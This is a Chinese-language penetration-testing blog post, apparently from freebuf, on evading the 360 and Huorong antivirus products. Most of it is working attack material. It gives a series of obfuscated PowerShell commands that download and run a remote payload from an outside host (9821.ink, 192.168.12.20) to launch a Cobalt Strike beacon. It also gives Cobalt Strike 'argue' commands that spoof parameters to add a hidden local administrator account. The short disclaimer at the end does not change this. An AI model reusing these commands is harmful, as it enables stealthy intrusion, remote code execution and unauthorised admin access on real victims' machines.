powershell对抗AV技巧 – 作者:zsl520

免杀上线一直是经久不衰的话题，今天介绍利用powershell上线来绕过360与火绒的防护，并介绍绕过添加用户的拦截的方式，我们的实验环境是一台装了360全家桶与火绒的win7。

一.powershell免杀绕过360与火绒上线：

1.powershell免杀绕过思路参考：

powershell 命令混淆

原始payload
Invoke-Expression (New-Object Net.WebClient).DownloadString(‘http:9821.ink/xxx’)

安全客
将http分开+号连接
Invoke-Expression (New-Object Net.WebClient).DownloadString(“ht”+”tp://9821.ink/xxx”)

变量代替
IEX $wc=New-Object Net.WebClient;$wc.DownloadString(‘h’+’ttp://9821.ink/xxx’)

转义符号加在其他字符前不影响字符的意思，避免在0,a,b,f,n,r,t,v的小写字母前出现即可。
Invoke-Expression (New-Object Net.WebClient).”Down`loadString”(‘h’+’ttp://9821.ink/xxx’)

同样可以使用在Net.Webclient上
Invoke-Expression (New-Object “`Ne`T.`Web`Cli`ent”).”Down`l`oadString”(‘h’+’ttp://9821.ink/xxx’)

freebuf
powershell -NoExit “$c1=’IEX(New-Object Net.WebClient).Downlo’;$c2=’123(”http://9821.ink/xxx”)’.Replace(‘123′,’adString’);IEX ($c1+$c2)”

powershell “$a1=’IEX ((new-object net.webclient).downl’;$a2=’oadstring(”http://9821.ink/xxx”))’;$a3=”$a1,$a2″;IEX(-join $a3)”

chabug #别名
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(‘http://9821.ink/xxx’)

综合起来 就成了最开始的上线命令：
powershell set-alias -name kaspersky -value Invoke-Expression;”$a1=’kaspersky ((new-object net.webclient).downl’;$a2=’oadstring(”http://9821.ink/xxx”))’;$a3=$a1,$a2;kaspersky(-join $a3)”

那么看了一些powershell的绕过上线cs思路，我们来执行修改命令达到上线

首先还是最原始的生成常见的方式来上线cs：

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.12.20:80/a’))”

我们可以看到，此时火绒发现了系统调用了powershell，立刻进行了拦截，那么我们就要修改powershell上线的命令，进行绕过达到上线。

原命令：powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.12.20:80/a’))”

我们可以利用powershell的特性，利用别名、分割、替换变量等多个方式来绕过检测。

修改后的命令：

powershell  -c “IEX(New-Object Net.WebClient).”DownloadString”(‘ht‘+’tp://192.168.12.20:80/a’)”

可以看到修改后的命令，对执行的命令进行替换，并将http分开+号连接的思路，便可以达到免杀上线效果。

360与火绒均无报警，CS已经上线，成功绕过杀软达到上线目的。

二.绕过杀软添加用户

在内网渗透过程中，有些时候需要往目标机器添加用户，来进行所需操作，但是添加用户杀软非常敏感，都会进行拦截。

为了突出文章目的，我们直接使用cs自带的提权EXP来达到system权限。

我们直接在cs进行用户添加。可以看到遭到了360的拦截：

beacon> shell net user tubai e2e2@wqw /add
此时的思路可以使用cs中argue参数绕过杀软添加用户：

#参数污染net1 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#查看污染的参数 argue
#用污染的net1执行敏感操作 execute net1 user tubai ddsd@123 /add
此时shell net user发现，tubai用户已经添加进去，且360与火绒均未拦截

我们再将tubai用户加入到administrator组

beacon> execute net1 localgroup administrators tubai /add
此时我们shell net user tubai ，发现已经成功加入administrators组中
至此便绕过了360与火绒对添加用户的拦截。

总结

powershell的绕过方式除了命令混淆还有很多，免杀的目的就是围绕你的目标机器进行实施的，并非要追求免杀率，过VT，只要过了你的目标机就好。还有，如无特殊需要，渗透过程中还是不添加用户为妙，毕竟日志都有记录，动静也不小。

参考：

http://www.0x3.biz/archives/837.html

https://xz.aliyun.com/t/7903#toc-0

安全措施：

各位要对powershell动作进行管控，勿用技术做未授权的事情！有兴趣可以关注公众号：花指令安全实验室，我们一起探讨学习交流！

来源：freebuf.com 2021-06-30 22:32:22 by: zsl520